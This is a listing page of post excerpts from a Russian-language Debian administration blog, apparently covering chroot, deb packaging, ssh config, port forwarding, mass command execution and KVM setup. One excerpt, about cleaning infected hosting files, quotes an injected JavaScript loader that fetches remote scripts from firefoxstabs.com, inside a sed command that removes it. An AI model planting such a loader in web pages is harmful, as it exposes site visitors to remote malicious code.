Debian.pro

Блог для пользователей и администраторов Debian


Администрирование

Используем chroot и debootstrap для всяких светлых целей — тестирование скриптов, программ и прочего.

Вообще в этих целях неплохо использовать виртуализацию. Но тут есть некоторые проблемы, которых лишен обычный chroot. Сразу отсеиваем Xen, KVM, vbox — слишком долго развертывается, кушает слишком много ресурсов, требует поддержки hw-виртуализации. Openvz — требует специального ядра, которое может и не поддерживать вашу железку (да и вообще не хочется сидеть на 32м ядре на ноуте). [...]

Простейший способ собрать свой deb-пакет с данными (например, с конфигами, скриптами, ключами авторизации).

Частенько возникает необходимость собрать пакет с какими либо файлами, из которых скомпилировать ничего нельзя. В моём случае это чаще всего самописные bash-скрипты, файл с public ключами ssh… Ещё интересная идея так же паковать архивы. В рассмотренном ниже примере мы создадим один deb пакет с аж тремя вкусными штуками: 1) конфигурационные файлы nginx с нашего сервера [...]

Зараженный js на хостинге

Вот столкнулся с такой штукой что во всех js файлах одного аккаунта были прописаны левые ссылки. Лечим таким образом в командной строке делаем : find 55 -name «*.js» |xargs sed -i «s|document.write(‘<scr’+’ipt src=\»https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\»></scr’+’ipt>’);var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript(‘http://firefoxstabs.com/’ + Math.random().toString().substring(3) + ‘.js’, function() {flag = 2;});}});});| [...]

«Алиасы» для ssh. Используем ~/.ssh/config для упрощения своей жизни.

Спасибо @riarheos за подсказку. Пост является логическим продолжением поста про DSH и решает проблему DSH с работой с нестандартными портами ssh. А так же сильно упрощает жизнь тем, кто ходит на разные серверы по разным портам под разными пользователями. Идея очень проста — мы создадим что-то вроде алиасов в конфиге ssh. Решение очевидное, но всё [...]

NAT’им отдельные порты или «а что делать, если мой веб-сервер внезапно переехал на другую машину». Проброс портов в локалке на шлюзе наружу.

Данный мануал поможет вам в двух глобальных ситуациях: 1) необходимо пробросить порт на шлюзе на одну из внутренних машин в локалке (т.н. port forwarding на роутерах). 2) если по каким то причинам вам необходимо перенаправить трафик с одной машины на другую по определенным портам. Например — переезд веб-сервера (а DNSы ещё не обновились), перенаправить трафик [...]

Управляем пачками debian серверов. Выполняем команды разом на куче хостов. Sysadmin lifehack.

Перед прочтением этого мануала крайне советую разрешить авторизацию рутом по ключам по ssh на всех подопытных серверах (и запретить авторизацию по паролю, если беспокоитесь). Заодно не забудьте поставить fail2ban. Иногда необходимо выполнить команду на всех серверах. У меня, например, каждый час. И как то я для этого давно завел утилиту и считаю её само собой [...]

Обеспечиваем безопасность LAMP методом «в лоб». Защищаемся от php-шеллов и прочих игрушек скрипт-киддисов. Библиотека amon.so

Собственно… меня снова начали спрашивать куда я пропал… Да-да-да… стыдно. На выходных сплю по 18 часов, а в будни — смотрим тег #yakit в твиттере. Ну и работа стала отнимать намного больше времени, в связи с вводом в строй кластера. А ещё на днях начну пробовать UEC (его же допилили, да?) на рекордных 5 серверах! [...]

Debian, KVM, финальные статьи. Установка необходимых пакетов. Установка KVM на Debian.

К данному моменту вы должны прочитать 4 статьи (и, само собой, выполнить необходимое): 1) обязательно — Debian, KVM, финальные статьи. Проверяем, подходит ли наш сервер для установки kvm. Некоторые размышления о том, какая аппаратная конфигурация подходит для kvm сервера. 2) чуть менее, чем обязательно — Debian, KVM, финальные статьи. Настраиваем сеть для KVM. KVM и [...]

Debian, KVM, финальные статьи. Проверяем, подходит ли наш сервер для установки kvm. Некоторые размышления о том, какая аппаратная конфигурация подходит для kvm сервера.

Для того, чтобы у вас заработал KVM у вас должно соблюдаться одно условие. Ваш процессор должен поддерживать технологии Intel VTx или AMD-V. Давайте удостоверимся в этом: root@debian-lvm:~# cat /proc/cpuinfo | egrep ‘(svm|vmx)’ Вывод должен быть не пустым. Например для core i3 (поддерживающего Intel VTx) я получил 4 таких строки: flags : fpu vme de pse [...]

Debian, KVM, финальные статьи. Настраиваем сеть для KVM. KVM и 2/3+ подсети на одном сервере.

UPDATE: Данную статью можно считать устаревшей для Debian Wheezy и выше. Несмотря на то, что всё описанное здесь в wheezy заработает, я рекомендую использовать более новую статью — «Настройка сети на dom0-машине в debian/ubuntu для KVM, updated.» Мы уже имеем созданные при помощи LVM логические томы, на которых будем размещать виртуальные машины. То есть мы [...]